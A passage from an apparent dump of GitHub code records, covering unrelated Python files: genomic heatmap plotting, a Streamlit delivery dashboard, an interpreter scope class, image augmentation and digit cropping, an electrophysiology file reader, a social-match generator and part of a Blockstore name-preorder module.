torch.cat((plot_array, filler), axis = 0)\n x_ticks += [0 for i in range(ppr - remainder)]\n \n for j in range(1, total_plots + 1):\n \n plot_letters(plot_dict['ax' + str(j)], letters[(j-1)*ppr:j*ppr], colors[(j-1)*ppr:j*ppr], ppr)\n ret = sns.heatmap(plot_array[(j-1)*ppr:j*ppr].T, cbar=True, center = 0, vmin = min_val, vmax = max_val, ax = plot_dict['ax' + str(j)], cmap = 'RdBu_r')\n \n\n if j == 1: \n if target_names:\n file = open(target_names)\n names = file.read().split(\"\\n\")\n title = names[plot_index]\n \n else:\n title = \"Target Index Plotted: \" + str(plot_index)\n \n \n mpl.rcParams['axes.titlesize'] = 40\n ret.set_title(title, y = 1.3)\n \n \n ret.set_yticks([i + 0.5 for i in range(4)])\n ret.set_yticklabels(labels = ['A','G','C','T'], rotation =0)\n ret.set_xticks([i*5 + 0.5 for i in range(int(math.ceil(ppr/5)))])\n ret.set_xticklabels(x_ticks[(j-1)*ppr:j*ppr:5], fontsize = 10)\n \n if j == total_plots and remainder != 0:\n xticks = plot_dict['ax' + str(j)].xaxis.get_major_ticks()\n \n\n for i in range(int(math.ceil(remainder/5)), int(ppr/5) + 1):\n xticks[i].set_visible(False)\n \n\n plt.savefig(\"./newSaves/\" + figname + \".\" + output_format, format = output_format)\n \n \n\ndef plot(input_file_path, output_name, ppr, file_index = None, target_names = None, user_index = None, figsize = None, output_format = None):\n \"\"\"\n This method formats the data, sets up the coloring scheme, and determines the values to plot\n \n Args:\n input_file_path : str\n Which values to plot. This should be a filed saved from the predictions method\n \n output_name : str\n Name of file where the output plot is saved\n \n ppr : int\n positions per row\n \n file_index : int\n The index of a prediction tensor (saved by the predict method) to be plotted. This argument is required if users \n provide an input file that contains the Multiplexer prediction for multiple inputs.\n \n user_index : int\n The index of the predicted feature to plot\n \n figsize : tuple (int,int)\n The size of the saved figured. Default = (50,50)\n \n output_format : str\n The output format of the plot e.g. 'pdf', 'png', etc.\n \n \n \"\"\"\n figsize = (50,50) if figsize == None else (int(figsize.split(\",\")[0]), int(figsize.split(\",\")[1]))\n \n #call model on the inputs\n Predicted_chromatin_profiles, reference, position, diff = get_data(input_file_path, file_index)\n length = reference.shape[-1]\n ppr = 200 if ppr == None else int(ppr)\n\n \n \n ref_indices = []\n for i in range(length):\n if reference[:,i].sum() == 0: #in the case the reference nucleotide was 'n'\n ref_index = 0\n else:\n ref_index = torch.nonzero(reference[:,i]).item()\n\n ref_indices.append(ref_index)\n\n\n #get mean alternative predictions\n \n \n alt_predictions = Predicted_chromatin_profiles * (reference!=1)[ None,:,:] \n alt_predictions = alt_predictions.sum(axis=1)/3\n alt_predictions = alt_predictions\n \n\n\n if user_index:\n plot_index = int(user_index)\n \n else:\n #get strongest index#\n max_arr = alt_predictions.min(axis = 1)\n plot_index = torch.argmin(max_arr[0]).item()\n\n\n\n plot_array = Predicted_chromatin_profiles[plot_index, :, :].T.detach()\n predictions = alt_predictions[plot_index, :]\n plot_array[torch.arange(length), ref_indices] = 0\n \n\n\n #get letters to plot\n letters = ref_indices #plot the letters\n x_ticks = [i for i in range(position - int(math.floor(length/2)) + 1, position + int(math.ceil(length/2)) + 1)] \n letter_colors = get_colors(predictions, diff)\n \n\n\n\n create_plot(plot_index, plot_array.detach().cpu(), letters, letter_colors, x_ticks, output_name, target_names, ppr, figsize, output_format)\n\n","repo_name":"jzhoulab/Multiplexer","sub_path":"CLI/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":11582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"35839986105","text":"#=================================================================\n#Bibliotecas\n#=================================================================\n\nimport pandas as pd\nimport folium\nimport plotly.express as px\nimport streamlit as st\nfrom PIL import Image\nimport plotly.graph_objects as go\nfrom streamlit_folium import folium_static\nfrom haversine import haversine\nimport numpy as np\n\n\n# ================================================================\n# Funções\n# =================================================================\ndef clean_dados(df):\n \n \"\"\"\n Essa função é responsável por fazer a limpeza dos dados\n 1 - Irá remover as colunas que tem os espaços\n 2 - Irá apagar as linhas que tem os valor nulos (NaN)\n 3 - Conversão de algumas coluanas categóricas para numericas\n 4 - Criação de uma nova coluna ['distance'] que mostra a distância média do restaurante para o cliente\n 5 - Criação da coluna [week_of_year]\n \"\"\"\n #Limpeza dos dados\n #Eliminando os espaços vazios\n df.loc[:, 'ID'] = df.loc[:, 'ID'].str.strip()\n df['Delivery_person_Age'] = df['Delivery_person_Age'].str.strip()\n df['Delivery_person_ID'] = df['Delivery_person_ID'].str.strip()\n df['Weatherconditions'] = df['Weatherconditions'].str.strip()\n df['Road_traffic_density'] = df['Road_traffic_density'].str.strip()\n df['Type_of_order'] = df['Type_of_order'].str.strip()\n df['Type_of_vehicle'] = df['Type_of_vehicle'].str.strip()\n df['Festival'] = df['Festival'].str.strip()\n df['City'] = df['City'].str.strip()\n\n # Eliminando as linhas que tem o conteu 'NaN'\n linhas_vazias = df['Delivery_person_Age'] != 'NaN'\n df = df.loc[linhas_vazias, :].copy()\n\n linhas_vazias = df['Road_traffic_density'] != 'NaN'\n df = df.loc[linhas_vazias, :]\n\n linhas_vazias = df['Festival'] != 'NaN'\n df = df.loc[linhas_vazias, :]\n\n linhas_vazias = df['City'] != 'NaN'\n df = df.loc[linhas_vazias, :]\n\n #Limpando a coluna Time Taken\n df['Time_taken(min)'] = df['Time_taken(min)'].apply(lambda x: x.split( '(min) ')[1])\n\n #convertendo as colunas\n df['Delivery_person_Age'] = df['Delivery_person_Age'].astype(int)\n df['Time_taken(min)'] = df['Time_taken(min)'].astype(int)\n df['Delivery_person_Ratings'] = df['Delivery_person_Ratings'].astype(float)\n df['Order_Date'] = pd.to_datetime( df['Order_Date'], format='%d-%m-%Y' )\n\n # Resetando o index\n df = df.reset_index(drop=True)\n\n # Crianda a coluna da semana\n df['week_of_year'] = df['Order_Date'].dt.strftime( \"%U\" )\n # Criando a coluna da distancia\n cols = ['Restaurant_latitude', 'Restaurant_longitude', 'Delivery_location_latitude', 'Delivery_location_longitude']\n df['distance'] = df.loc[:, cols].apply(lambda x: haversine( (x['Restaurant_latitude'], x['Restaurant_longitude']),(x['Delivery_location_latitude'],x['Delivery_location_longitude']) ),axis=1)\n return (df)\n\ndef order_by_day(df):\n \"\"\"\n Esta função irá plotar o gráfico de barra das colunas ID e Order_Date\n \"\"\"\n df_aux = df.loc[:, ['ID', 'Order_Date']].groupby('Order_Date').count().reset_index()\n fig = px.bar(df_aux, x='Order_Date', y='ID')\n return fig\n\ndef traffic_order_share(df):\n \"\"\"\n Esta função irá plotar o gráfico de pizza da colunas ID e Road_Traffic_density\n \"\"\"\n df_aux = df.loc[:, ['ID', 'Road_traffic_density']].groupby('Road_traffic_density').count().reset_index()\n fig = px.pie(df_aux, values='ID', names='Road_traffic_density')\n return fig\n\ndef order_volume_city_traffic(df): \n \"\"\"\n Esta função irá plotar o gráfico de Scatter das colunas City e Road_traffic e volume será pela coluna ID\n \"\"\"\n df_aux = df.loc[:, ['ID', 'City', 'Road_traffic_density']].groupby(['City', 'Road_traffic_density']).count().reset_index()\n fig= px.scatter(df_aux, x='City', y='Road_traffic_density',size='ID', color='City')\n st.plotly_chart(fig, use_container_width=True) \n return fig\n\ndef order_by_week(df):\n \"\"\"\n Esta função irá plotar o gráfico de linha das colunas Week_of_year e ID\n \"\"\"\n df_aux = df.loc[:, ['ID', 'week_of_year']].groupby('week_of_year').count().reset_index()\n fig = px.line(df_aux, x='week_of_year', y='ID', title='Quantidade de pedidos por semana')\n st.plotly_chart(fig, use_container_width=True)\n return fig\n\ndef delivery_per_week (df):\n \"\"\"\n Esta função irá plotar o gráfico de linha das colunas week_of_year e order_by_week\n \"\"\"\n df_aux1 = df.loc[:,['ID', 'week_of_year']].groupby('week_of_year').count().reset_index()\n df_aux2 = df.loc[:,['Delivery_person_ID', 'week_of_year']].groupby('week_of_year').nunique().reset_index()\n #Juntando as duas tabelas\n df_aux = pd.merge(df_aux1,df_aux2, how='inner')\n df_aux['order_by_week'] = df_aux['ID'] / df_aux['Delivery_person_ID']\n fig = px.line(df_aux, x='week_of_year', y='order_by_week')\n st.plotly_chart(fig, use_container_width=True)\n return fig\n\ndef country_maps(df):\n \"\"\"\n Esta função irá plotar o mapa das localidades dos restaurantes\n \"\"\"\n df_aux = (df.loc[:, ['City', 'Road_traffic_density', 'Delivery_location_latitude', 'Delivery_location_longitude']]\n .groupby(['City', 'Road_traffic_density'])).median().reset_index()\n\n map = folium.Map(zoom_start=1100)\n\n for index, location_info in df_aux.iterrows():\n folium.Marker([location_info['Delivery_location_latitude'],\n location_info['Delivery_location_longitude']],\n popup=location_info[['City', 'Road_traffic_density']] ).add_to(map)\n\n folium_static(map, width=1024, height=600)\n return map\n\n\n#--------------------------------------------------------------------------------\n#---------------------------------Início do código lógico------------------------\nst.set_page_config(page_title='Company_view', page_icon=':bird:', layout='wide', initial_sidebar_state='collapsed')\n#-----------------------------\n#Importação dos dados\n#-----------------------------\n#Leitura do arquivo\ndf1 = pd.read_csv('train.csv')\ndf = df1.copy()\n\n#-----------------------------\n#Dataframe limpo\n#-----------------------------\ndf = clean_dados(df)\n\n#=============================================================================\n# BARRA LATERAL\n#=============================================================================\nst.header('Marketplace - Visão Cliente')\nimagem = Image.open(\"logo.png\")\nst.sidebar.image(imagem, width=120)\nst.sidebar.markdown('# Cury Company')\nst.sidebar.markdown('## Fastest Delivery in Town')\nst.sidebar.markdown(\"\"\"______\"\"\")\nst.sidebar.markdown('Selecione uma data limite')\ndate_slider = st.sidebar.slider('Até qual valor?',\n value=pd.datetime(2022, 4, 13),\n min_value=pd.datetime(2022, 2, 11),\n max_value=pd.datetime(2022, 4, 13),\n format='DD-MM-YYYY')\nst.sidebar.markdown(\"\"\"______\"\"\")\ntraffic_option = st.sidebar.multiselect('Quais as condições do trânsito',\n ['Low', 'Medium', 'High', 'Jam'],\n default=['Low', 'Medium', 'High', 'Jam'])\nst.sidebar.markdown(\"\"\"______\"\"\")\nst.sidebar.markdown('### Powered by Comnunidade DS')\n\n#Filtro de data\nlinhas_selecionadas = df['Order_Date'] < date_slider\ndf = df.loc[linhas_selecionadas, :]\n\n#Filtro de trânsito\nlinhas_selecionadas = df['Road_traffic_density'] .isin(traffic_option)\ndf = df.loc[linhas_selecionadas, :]\n\n#=======================================================================\n# LAYOUT DO DASHBOARD\n#=======================================================================\ntab1, tab2, tab3 = st.tabs(['Visão Gerencial', 'Visão Tática', 'Visão Geográfica'])\n\nwith tab1:\n #Criando o container\n with st.container():\n # Order Metric\n st.header('Order by Day')\n fig = order_by_day(df) # Chamando a função\n st.plotly_chart(fig, use_container_width=True)\n\n col1, col2 = st.columns(2)\n with col1:\n st.header ('Traffic Orde Share')\n fig = traffic_order_share(df) # Chamando a função\n st.plotly_chart(fig, use_container_width=True)\n \n with col2:\n st.header ('Comparison of order volume by city and type of traffic')\n fig = order_volume_city_traffic(df) # Chamando a função\nwith tab2:\n st.header('Order by Week')\n fig = order_by_week(df) # Chamando a função\n \n st.header('number of orders per delivery person per week')\n fig = delivery_per_week(df) # Chamando a função\n \n \n \nwith tab3:\n st.header('Country Maps')\n map = country_maps(df) # Chamando a função\n ","repo_name":"francalfc/fastest_delivey_Curry","sub_path":"pages/1_visao_empresa.py","file_name":"1_visao_empresa.py","file_ext":"py","file_size_in_byte":8748,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"74378242869","text":"from .exceptions import JAPLError\nfrom .tokenobject import Token\nfrom .expression import Variable\n\n\nclass Environment(object):\n \"\"\"\n A wrapper around a hashmap representing\n a scope\n \"\"\"\n\n def __init__(self, enclosing=None):\n \"\"\"Object constructor\"\"\"\n\n self.map = {}\n self.enclosing = enclosing\n\n def define(self, name: str, attr: object):\n \"\"\"Defines a new variable in the scope\"\"\"\n\n self.map[name] = attr\n\n def get(self, name: Token):\n \"\"\"Gets a variable\"\"\"\n\n if name.lexeme in self.map:\n return self.map[name.lexeme]\n elif self.enclosing:\n return self.enclosing.get(name)\n raise JAPLError(name, f\"Undefined name '{name.lexeme}'\")\n\n def get_at(self, distance, name):\n \"\"\"Gets a variable in a specific scope\"\"\"\n\n return self.ancestor(distance).map.get(name)\n\n def ancestor(self, distance):\n \"\"\"Finds the scope specified by distance\"\"\"\n\n env = self\n for _ in range(distance):\n env = env.enclosing\n return env\n\n def assign_at(self, distance, name, value):\n \"\"\"Same as get_at, but assigns instead of retrieving\"\"\"\n\n self.ancestor(distance).map[name.lexeme] = value\n\n def delete(self, var):\n \"\"\"Deletes a variable\"\"\"\n\n if var.name.lexeme in self.map:\n del self.map[var.name.lexeme]\n elif self.enclosing:\n self.enclosing.delete(var)\n else:\n raise JAPLError(var.name, f\"Undefined name '{var.name.lexeme}'\")\n\n def assign(self, name: Token, value: object):\n \"\"\"Assigns a variable\"\"\"\n\n if name.lexeme in self.map:\n if isinstance(value, Variable):\n self.map[name.lexeme] = self.get(value.name)\n else:\n self.map[name.lexeme] = value\n elif self.enclosing:\n self.enclosing.assign(name, value)\n else:\n raise JAPLError(name, f\"Undefined name '{name.lexeme}'\")\n","repo_name":"japl-lang/japl-python","sub_path":"JAPL/meta/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"5261553759","text":"from keras.preprocessing.image import ImageDataGenerator, img_to_array, load_img\nimport numpy as np\nimport argparse\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True, help=\"path to the input image\")\nap.add_argument(\"-o\", \"--output\", required=True, help=\"path to output directory to store augmentation examples\")\nap.add_argument(\"-p\", \"--prefix\", type=str, help=\"output filename prefix\")\nargs = vars(ap.parse_args())\n\nprint(\"[INFO] loading example image...\")\nimage = load_img(args[\"image\"])\nimage = np.expand_dims(image, axis=0)\n\naug = ImageDataGenerator(rotation_range=30, width_shift_range=0.1, height_shift_range=0.1, \n\tshear_range=0.2, zoom_range=0.2, horizontal_flip=True, fill_mode=\"nearest\")\ntotal = 0\n\nprint(\"[INFO] generating images...\")\nimageGen = aug.flow(image, batch_size=1, save_to_dir=args[\"output\"], \n\tsave_prefix=args[\"prefix\"], save_format=\"jpg\")\n\nfor image in imageGen:\n\ttotal += 1\n\tif total == 10:\n\t\tbreak\n","repo_name":"TyroneLi/pyimagesearchcode","sub_path":"data_augmentation/augmentation_demo.py","file_name":"augmentation_demo.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"94"} +{"seq_id":"14602850450","text":"import h5py\nimport numpy as np\nimport FormatInterface\n\nclass HandelMCH5File(FormatInterface.FormatInterface):\n def __init__(self,inputFile,isGui):\n super().__init__()\n self.isGui=isGui\n self.inputFile = inputFile\n self.listOfRecordings = []\n self.listOfStreams = []\n self.extractedFile = []\n def GetData(self):\n try:\n tickPosition = 9\n self.extractedFile = h5py.File(self.inputFile,\"r\")\n self.listOfRecordings= self.ShowFileInnerSection(self.extractedFile['/Data/'])\n for recording in self.listOfRecordings:\n self.listOfStreams= self.ShowFileInnerSection(self.extractedFile['/Data/'+recording+'/AnalogStream/'])\n for stream in self.listOfStreams:\n self.timeStepMS= (self.extractedFile['/Data/' + recording + '/AnalogStream/' + stream + '/InfoChannel'][0])[tickPosition]*1e-3\n self.durationMS = (self.extractedFile['/Data/' + recording + '/AnalogStream/' + stream + '/ChannelDataTimeStamps'][0,2])* self.timeStepMS\n self. nChannels = len(np.array((self.extractedFile['/Data/' + recording + '/AnalogStream/' + stream + '/ChannelData'])[:, 0]))\n if (self.isGui == False):\n self.GetRelevantTimestamps()\n self.GetRelevantChannels()\n if (( self.startTimeIndex!=None) and ( self.endTimeIndex!=None) and ( self.startChannel!=None) and ( self.endChannel!=None) and ( self.timestamps[0]!=None)):\n self.metaData = np.array(\n (self.extractedFile['/Data/' + recording + '/AnalogStream/' + stream + '/ChannelData'])[ self.startChannel-1: self.endChannel, self.startTimeIndex: self.endTimeIndex])\n self.metaData=self.metaData.transpose()\n self.PlotData(self.isGui)\n else:\n print(\"Error Loading Data, Please Try Again\")\n except Exception as e:\n print(\"An exception occurred. Please Try Again\")\n print(e)\n return\n\n def GetAndPlotMetaData(self):\n self.metaData = np.array(\n (self.extractedFile['/Data/' +self.listOfRecordings[0] + '/AnalogStream/' + self.listOfStreams[0] + '/ChannelData'])[\n 0: self.nChannels, self.startTimeIndex: self.endTimeIndex])\n self.metaData = self.metaData.transpose()\n return self.PlotData(self.isGui)","repo_name":"Michaellevi68/neural-electrophysiology-tool-team-python","sub_path":"MCH5Interface.py","file_name":"MCH5Interface.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"33885303069","text":"import os\nfrom tempfile import gettempdir\n\nBASE_DIR = os.path.dirname(__file__)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.sessions',\n 'django.contrib.contenttypes',\n 'django.contrib.admin',\n 'cufon',\n)\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n }\n}\n\nSTATIC_ROOT = os.path.join(gettempdir(), 'cufon-test')\nSTATIC_URL = '/static/'\n\nDEBUG = True\n","repo_name":"JonnyFunFun/django-cufon","sub_path":"cufon/tests/test_django_cufon.py","file_name":"test_django_cufon.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"3111600763","text":"'''lista = [\"1 2 3 4\"]\r\nfor i in lista:\r\n a = i.split(\" \")\r\nprint(a)'''\r\n\r\ndef lector(archivoEntrada):\r\n lineas = []\r\n archivo= open(archivoEntrada)\r\n for linea in archivo.readlines():\r\n a = linea.rstrip('\\n')\r\n lineas.append(a)\r\n archivo.close()\r\n return lineas\r\n\r\ndef elevarNum(lineas):\r\n for i in lineas:\r\n listaSeparada = i.split(\" \")\r\n multiplicar = []\r\n try:\r\n n = 0\r\n u = 1\r\n for i in range(len(listaSeparada)):\r\n #print(listaSeparada[n],listaSeparada[u])\r\n #elevar = float(listaSeparada[n])**float(listaSeparada[u])\r\n elevar = int(listaSeparada[n])**int(listaSeparada[u])\r\n print(elevar)\r\n n = n+2\r\n u = u+2\r\n multiplicar.append(elevar)\r\n except IndexError:\r\n pass\r\n product = 1\r\n for i in multiplicar:\r\n product *= i\r\n print(product)\r\n \r\n\r\nif __name__ == '__main__':\r\n print('toyvolaoalo')\r\n lineas = lector('primos.txt')\r\n elevarNum(lineas)","repo_name":"NikoHQ/Python","sub_path":"leertxt.py","file_name":"leertxt.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1208541439","text":"# By\n# ████████╗██╗ ██╗ █████╗ ███╗ ██╗ ██╗ ██╗ ██████╗ \n# ╚══██╔══╝██║ ██║██╔══██╗████╗ ██║ ██║ ██║██╔═══██╗\n# ██║ ██║ ██║███████║██╔██╗ ██║ ███████║██║ ██║\n# ██║ ██║ ██║██╔══██║██║╚██╗██║ ██╔══██║██║ ██║\n# ██║ ╚██████╔╝██║ ██║██║ ╚████║ ██║ ██║╚██████╔╝\n# ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═════╝ \n\n# Email: ttuan.ho@outlook.com \n\nimport re\nimport time, datetime\nfrom main_files.exceptions import InvalidTypeError\nimport pytest\n\ndef checkDBType(input, type='str', strLength=None):\n if strLength != None and (not isinstance(strLength, int)):\n raise ValueError(f\"Invalid type of {strLength}\")\n if type(input) == 'int' and str(type) == 'int':\n return True\n if type(input) == 'str' and str(type) == 'str':\n return len(input) <= strLength\n \nif __name__ == '__main__':\n with pytest.raises(InvalidTypeError, match='*'):\n checkDBType('asfds', strLength='asfsdf')\n\n\n\n","repo_name":"ttuanho/cse-hackathon-2020","sub_path":"backend/main_files/helpers/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41098672485","text":"from src.org.fotw.h2h.h2h_pb2 import MatchSet, Match\n\nimport random\n\n\n_MAX_GUEST_COUNT = 2\n_MIN_SINGLES_GROUP_SIZE = 3\n_MAX_SINGLES_GROUP_SIZE = 4\n\n\ndef gen_match_config(match_date, p_config):\n \"\"\"\n Returns (matches, found_match) for a given participant config.\n\n match_date is assumed to be a datetime.datetime object\n \"\"\"\n p_names = [p_name for p_name in p_config if p_config[p_name].participating]\n random.shuffle(p_names) # Shuffles in-place.\n\n match_set = MatchSet(date_yyyymmdd=match_date.strftime('%Y%m%d'))\n i = 0\n while i < len(p_names):\n first_p_name = p_names[i]\n is_hosted = p_config[first_p_name].can_host\n i += 1\n\n if i >= len(p_names):\n return None, False\n\n n_guests = -1\n if not is_hosted:\n possible_coguest_len = 0\n group_gender = p_config[first_p_name].gender_if_single\n while (\n i + possible_coguest_len < len(p_names)\n and not (\n p_config[p_names[i+possible_coguest_len]].is_family\n or p_config[p_names[i+possible_coguest_len]].gender_if_single != group_gender\n )\n ):\n possible_coguest_len += 1\n if possible_coguest_len < _MIN_SINGLES_GROUP_SIZE:\n return None, False\n n_guests = random.randint(_MIN_SINGLES_GROUP_SIZE, min(possible_coguest_len, _MAX_SINGLES_GROUP_SIZE))\n if is_hosted:\n # p_names[i] is now the first guest participant. Figure out how many\n # co-guests are possible.\n # Constraint: at most one family, no large families with singles..\n possible_coguest_len = 0\n has_family = False\n has_singles = False\n while (\n i + possible_coguest_len < len(p_names)\n and not (\n (has_family and p_config[p_names[i+possible_coguest_len]].is_family)\n or (has_singles and p_config[p_names[i+possible_coguest_len]].child_count >= 5)\n )\n ):\n has_family = (\n has_family or p_config[p_names[i+possible_coguest_len]].is_family)\n has_singles = (\n has_singles or (not p_config[p_names[i+possible_coguest_len]].is_family))\n possible_coguest_len += 1\n n_guests = random.randint(1, min(possible_coguest_len, _MAX_GUEST_COUNT))\n member_names = p_names[i:i+n_guests] + [first_p_name]\n i += n_guests\n\n match = match_set.match.add()\n if is_hosted:\n match.host = first_p_name\n match.member.extend(sorted(member_names))\n return match_set, True\n\n\ndef gen_sprinkler_match_config(match_date, p_config):\n \"\"\"\n Returns (matches, found_match) for a given participant config trying to\n match families with families and sprinkle singles in (and also trying\n not to overload families with 3+ additional singles).\n\n match_date is assumed to be a datetime.datetime object\n \"\"\"\n p_names = [p_name for p_name in p_config if p_config[p_name].participating]\n host_names = [p_name for p_name in p_names if p_config[p_name].can_host]\n sprinkler_names = [p_name for p_name in p_names if not p_config[p_name].can_host]\n\n random.shuffle(host_names)\n random.shuffle(sprinkler_names)\n match_set = MatchSet(date_yyyymmdd=match_date.strftime('%Y%m%d'))\n\n # Get to an even number of host_names for matching below.\n if len(host_names) % 2 == 1:\n if not sprinkler_names:\n host_names.pop() # That host just won't get to participate :(\n else:\n match = match_set.match.add()\n match.host = host_names.pop()\n match.member.extend(sorted([match.host, sprinkler_names.pop()]))\n\n if len(host_names) % 2 == 1:\n raise Exception('Impossible: host_names is not an even length!')\n\n # Make hostless singles groups so that families don't get overwhelmed\n # with 3+ singles on top of another family being hosted.\n while len(sprinkler_names) > len(host_names):\n # Make singles hostless groups\n m_singles = [x for x in sprinkler_names if p_config[x].gender_if_single == 'M']\n f_singles = [x for x in sprinkler_names if p_config[x].gender_if_single == 'F']\n other_sprinklers = [x for x in sprinkler_names if x not in m_singles and x not in f_singles]\n\n hostless_src = m_singles if len(m_singles) > len(f_singles) else f_singles\n if len(hostless_src) < _MIN_SINGLES_GROUP_SIZE:\n break # Allow overflow rather than drop singles\n\n n_singles = random.randint(_MIN_SINGLES_GROUP_SIZE, min(len(hostless_src), _MAX_SINGLES_GROUP_SIZE))\n gathering_members = []\n for i in range(n_singles):\n gathering_members.append(hostless_src.pop())\n \n match = match_set.match.add()\n match.member.extend(sorted(gathering_members))\n\n # Reconstructing it this way works because when popping from hostless_src,\n # we're also popping from the actual source list (m_singles or f_singles)\n # so sprinkler_names should shrink.\n sprinkler_names = other_sprinklers + m_singles + f_singles\n random.shuffle(sprinkler_names)\n\n # Match all the families together (since len(host_names) is even).\n for i in range(0, len(host_names), 2):\n match = match_set.match.add()\n match.host = host_names[i]\n match.member.extend(sorted([host_names[i], host_names[i+1]]))\n\n hosted_matches = [match for match in match_set.match if match.host]\n if hosted_matches:\n i = 0\n while sprinkler_names:\n hosted_matches[i].member.append(sprinkler_names.pop())\n i = (i + 1) % len(hosted_matches)\n\n return match_set, True\n","repo_name":"agrimball/fotw-h2h-dev","sub_path":"src/org/fotw/h2h/match_generator.py","file_name":"match_generator.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"72201800949","text":"import cv2\nimport numpy as np\n\n# resize image\n# load the example image\nimage = cv2.imread(\"sample2.jpeg\")\ncrop_img = image[350:600, 200:450]\ncv2.imwrite('cropped.png', crop_img)\n\n# pre-process the image by resizing it, converting it to\n# graycale, blurring it, and computing an edge map\ngray = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY)\n# Applying Gaussian blurring with a 5×5 kernel to reduce high-frequency noise\n\nthresh1 = cv2.threshold(gray, 150, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n\nkernel1 = cv2.getStructuringElement(cv2.MORPH_RECT, (2, 2))\nthresh1 = cv2.morphologyEx(thresh1, cv2.MORPH_OPEN, kernel1)\ncv2.imshow('cropped.png', thresh1)\ncv2.waitKey(0)\n\nblurred = cv2.GaussianBlur(thresh1, (5, 5), 0)\nedged = cv2.Canny(blurred, 50, 200, 255)\n\n\n# get black box contour: \n# find contours in the edge map, then sort them by their\n# size in descending order\n\ncnts, _ = cv2.findContours(edged, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\nprint(len(cnts))\ncnts = sorted(cnts, key=lambda x: cv2.contourArea(x), reverse=True)\ndisplayCnt = cnts[0]\nprint(displayCnt.shape)\n# mask = np.zeros(crop_img.shape, dtype='uint8')\n# print(crop_img.shape)\n# cv2.drawContours(mask, cnts, -1, (255),1)\n# mask = mask[:, :, 1]\n\n# isolated = cv2.bitwise_and(crop_img, crop_img, mask=mask)\nx,y,w,h= cv2.boundingRect(displayCnt)\ncropped_img=crop_img[y:y+h, x:x+w]\ncolor = cv2.cvtColor(cropped_img, cv2.COLOR_BGR2GRAY)\n\ncv2.imwrite('gray.png', color)\n\n\n# separate digits -> ignore white hole between last 2 digits\nimg_name = \"ex2.png\"\n# do binary color transform\n# threshold the warped image, then apply a series of morphological\n# operations to cleanup the thresholded image\nthresh = cv2.threshold(color, 150, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n\nkernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (2, 2))\nthresh = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\n\ncv2.imwrite('thresh.png', thresh)\n# find contours in the thresholded image, then initialize the\n# digit contours lists\n\nmatrix = np.asarray(thresh)\nprint(matrix.shape)\nnum_rows, num_cols = matrix.shape\nblock_tuples = []\nblobs = []\nl_cnt = 0\nr_cnt = 0\n\nrow = int(num_rows / 2)\nflag = False\n# get black regions\nfor c in range(matrix.shape[1]):\n if (matrix[row, c] == 0):\n if not flag:\n l_cnt = r_cnt\n flag = not flag\n else:\n if flag:\n block_tuples.append(l_cnt)\n blobs.append(r_cnt - l_cnt)\n flag = not flag\n \n r_cnt = r_cnt + 1\n\nprint(blobs)\nprint(block_tuples)\ntop_three = sorted(zip(blobs, block_tuples), reverse=True) [:3]\nprint(top_three)\nvert_padding = 7\nhz_padding = 5\n\nfor i in range(2):\n len, idx = top_three[i]\n post_len, post_idx = top_three[i+1]\n if i == 1:\n cv2.imwrite('dig_{index}.png'.format(index = i + 1), color[vert_padding:num_rows-vert_padding, idx+len - hz_padding:post_idx-10 + hz_padding])\n else: \n cv2.imwrite('dig_{index}.png'.format(index = i + 1), color[vert_padding:num_rows-vert_padding, idx+len - hz_padding:post_idx + hz_padding])\n\nidx_3, len_3 = top_three[2]\ncv2.imwrite('dig_3.png', color[ vert_padding:num_rows-vert_padding, idx_3+len_3 - hz_padding:num_cols + hz_padding])\n","repo_name":"Emerald-Z/OCR-digit-recognition","sub_path":"image_processing_cv/img_prc2.py","file_name":"img_prc2.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"5467532489","text":"from pybitcoin import embed_data_in_blockchain, \\\n analyze_private_key, serialize_sign_and_broadcast, make_op_return_script, \\\n make_pay_to_address_script, b58check_encode, b58check_decode, BlockchainInfoClient, \\\n hex_hash160, bin_hash160, BitcoinPrivateKey\n\n\nfrom pybitcoin.transactions.outputs import calculate_change_amount\nfrom utilitybelt import is_hex\nfrom binascii import hexlify, unhexlify\n\nfrom ..b40 import b40_to_hex, is_b40\nfrom ..config import *\nfrom ..scripts import blockstore_script_to_hex, add_magic_bytes, get_script_pubkey\nfrom ..hashing import hash_name\n\n\ndef build(name, script_pubkey, register_addr, consensus_hash, testset=False):\n \"\"\"\n Takes a name, including the namespace ID (but not the id: scheme), a script_publickey to prove ownership\n of the subsequent NAME_REGISTER operation, and the current consensus hash for this block (to prove that the \n caller is not on a shorter fork).\n \n Returns a NAME_PREORDER script.\n \n Record format:\n \n 0 2 3 23 39\n 